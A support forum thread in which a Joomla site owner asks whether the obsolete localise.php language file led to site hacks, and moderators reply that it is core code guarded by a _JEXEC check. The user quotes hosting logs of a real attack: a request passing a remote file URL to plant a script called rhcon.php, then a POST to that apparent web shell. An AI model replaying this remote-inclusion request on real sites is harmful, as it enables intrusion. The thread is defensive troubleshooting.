Support Forum

  • Page:
  • 1

en-GB.localise.php

zentoolsIf you use Zentools please post a review at the Joomla! Extensions Directory.

10 years 7 months ago
Hi,

Some of our websites were hacked the last couple of weeks. It seems that the file en-GB.localise.php (or any other language.localise.php file) is being misused. This file was used in J1.7 (so I was told) and is now obsolete in newer versions of joomla. But in your quickstarts the file is still there.

Might it be a good idea to remove this file? It would improve security.

Cheers,

Leonard
  • Leonard van der Plas's Avatar
  • Leonard van der Plas
  • LIfetime Developer - Big Bamboo
  • 82 posts
  • 3 Thanks
  • Karma: 4
The administrator has disabled public write access.
10 years 7 months ago
Hi Leonard,

I have just checked the core 2.5 and 3.x packages and this file is still part of Joomla in the latest downloads.

Do you have any information on how this file is hacked?
It looks to me like a few search functions and I couldn't find anything on the Joomla bug tracker.

Regards,

Rob
  • Robert Went's Avatar
  • Robert Went
  • Moderator
  • 2210 posts
  • 196 Thanks
  • Karma: 90
The administrator has disabled public write access.
10 years 7 months ago
Hi Leonard,

Talking to the team who know way more about this then me :)

That file is part of the Joomla core 2.5 and 3.0 packages

With that file in particular its likely that this was just the file the hacker hacked and not due to a particular issue / flaw

Cheers
Paul
  • manh's Avatar
  • manh
  • Moderator
  • 45248 posts
  • 2106 Thanks
  • Karma: 603
The administrator has disabled public write access.
10 years 7 months ago
Ah okay. I don't have much more info on this matter. I'm not that technical and for this kind of things I totally rely on my hosting provider's support. My provider gave me the advise to remove the file as it was obsolete according to them... Their answer on my support question (i'll try to translate):
/language/nl-NL/nl-NL.localise.php is being misused to place the malifide script rhcon.php. This is a part of the logs:

[14/Aug/2013:01:52:12 +0200] \"GET /language/nl-NL/nl-NL.localise.php?z=rhcon.php&id=http%3A%2F%2Fcassandra.is%2Ftmp%2Fr.txt HTTP/1.1\"
200 2 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3)
Gecko/20100401 Firefox/3.6.3\"
[14/Aug/2013:01:52:12 +0200] \"POST /language/nl-
NL/rhcon.php HTTP/1.1\" 200 69751 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3\"

This script is used in Joomla version 1.7 which is no longer supported. We advise you to upgrade
(the upgrade is what we had already done half a year ago)


I'm starting to think the tech support of my hosting provider isn't really up-to-date on this matter. Or maybe I just don't understand what they are saying.
  • Leonard van der Plas's Avatar
  • Leonard van der Plas
  • LIfetime Developer - Big Bamboo
  • 82 posts
  • 3 Thanks
  • Karma: 4
The administrator has disabled public write access.
10 years 7 months ago
Hi Leonard,

I think this is probably over my head but the file contains this line that should stop it from being called directly before any of the code that follows it can be accessed:
defined('_JEXEC') or die;

So to run any malicious code there must already be php files on the account which define _JEXEC (which also doesn't make sense as they would then be able to write files directly without having to use other scripts).

The actual logs might just be showing an attempted hack before it found another vulnerable file on the system.

I'm no security expert though so it's just a guess.

Rob
  • Robert Went's Avatar
  • Robert Went
  • Moderator
  • 2210 posts
  • 196 Thanks
  • Karma: 90
The administrator has disabled public write access.
The following user(s) said Thank You: Leonard van der Plas

zentoolsIf you use Zentools please post a review at the Joomla! Extensions Directory.

Happy Campers

Close